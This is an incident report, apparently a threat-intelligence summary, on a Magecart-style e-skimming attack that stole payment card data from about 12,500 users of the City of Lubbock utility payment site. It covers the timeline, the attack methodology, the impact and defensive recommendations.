Full Report
At least 12,000 people in Texas had sensitive financial information stolen by hackers who secretly implanted malicious code into the utility payment website of the City of Lubbock.
Analysis Summary
# Incident Report: City of Lubbock Utility Payment Website Skimming Attack
## Executive Summary
Hackers successfully implanted malicious code into the City of Lubbock's third-party hosted utility payment website, leading to the theft of financial details from at least 12,000 customers. The attack utilized an e-skimmer technique via a fake pop-up window, operating between December 18, 2024, and January 6, 2025. The incident highlights risks associated with third-party vendor security in public-facing payment systems.
## Incident Details
- Discovery Date: January 6, 2025
- Incident Date: December 18, 2024 – January 6, 2025
- Affected Organization: City of Lubbock (COLU) Utility Payment System
- Sector: Local Government / Utilities
- Geography: Lubbock, Texas, USA (Victims nationwide)
## Timeline of Events
### Initial Access
- Date/Time: On or around December 18, 2024
- Vector: Compromise/Injection into the third-party hosted utility payment website.
- Details: A malicious actor created a fake pop-up window on the legitimate City of Lubbock Utilities (COLU) payment website, designed to harvest customer input.
### Lateral Movement
- Not explicitly detailed, but the attack was confined to the front-end payment interface hosted by the third-party vendor; the city's internal network was not breached.
### Data Exfiltration/Impact
- Data exfiltrated included names, billing addresses, payment card numbers (PAN), CVVs, and expiration dates from customers who entered information into the fake pop-up.
- Affected timeframe: Utility payments (water, wastewater, storm water, solid waste) made between December 18, 2024, and January 6, 2025.
### Detection & Response
- Detection: City officials discovered the malicious pop-up window on January 6, 2025.
- Response actions: Notification letters were sent to affected victims across the country. Payment data integrity for all transactions made during this period was accounted for (though payments were not delayed, the data input was compromised).
## Attack Methodology
- Initial Access: Injection of malicious code (e-skimmer) onto the third-party hosted e-commerce payment page.
- Persistence: The malicious code remained active within the payment interface script until detected.
- Privilege Escalation: Not applicable/Not reported (attack focused on data capture, not internal network access).
- Defense Evasion: The use of a sophisticated, contextually relevant pop-up window on a legitimate site allowed the malicious code to blend in during the payment process.
- Credential Access: Direct capture of payment card details (PAN, CVV, Expiration Date) as they were entered by users.
- Discovery: Reconnaissance was performed by the attackers against the front-end of the payment portal.
- Lateral Movement: Contained within the web application layer; no internal network movement reported.
- Collection: Data collected via input fields on the fake pop-up window.
- Exfiltration: Implied exfiltration of captured payment card data (details not provided).
- Impact: Financial data theft.
## Impact Assessment
- Financial: Costs include breach notification, investigation, and potential liability from card schemes. (Specific costs not disclosed).
- Data Breach: Sensitive payment card information (PANs, CVVs, Expirations) and PII (Name, Billing Address) for approximately 12,503 individuals.
- Operational: No delay in utility payments was reported.
- Reputational: Negative impact due to publicly reported data breach involving municipal utilities.
## Indicators of Compromise
- Network indicators: Not detailed (as the compromise was via code injection, not C2 communication details readily available).
- File indicators: Malicious JavaScript/Code snippet causing the fake pop-up injection.
- Behavioral indicators: Unsolicited pop-up window appearing during the known payment workflow on COLU’s utility portal.
## Response Actions
- Containment measures: Removal or disabling of the malicious code/pop-up window on the payment website after detection on January 6, 2025.
- Eradication steps: Identification and severing of the method used by the attacker to inject the malicious script (presumably involving remediation on the third-party vendor's platform).
- Recovery actions: Notification of affected parties and monitoring of payment systems.
## Lessons Learned
- The reliance on a third-party vendor for public-facing payment infrastructure introduces significant security risk if oversight is insufficient.
- E-skimming/Magecart-style attacks remain a highly effective vector for credential harvesting, bypassing traditional perimeter defenses.
- The incident demonstrates a critical gap in real-time monitoring of front-end code integrity for payment processing gateways.
## Recommendations
- Immediately conduct a comprehensive security audit and forensic review of the third-party payment processor.
- Implement Content Security Policy (CSP) headers with strict restrictions on inline scripts and resource loading to prevent unexpected third-party code injection.
- Increase real-time monitoring and anomaly detection focused on the structure and behavior of checkout/payment forms on all public web applications.
- Re-evaluate the vendor contract to include stringent, auditable security mandates for payment processing.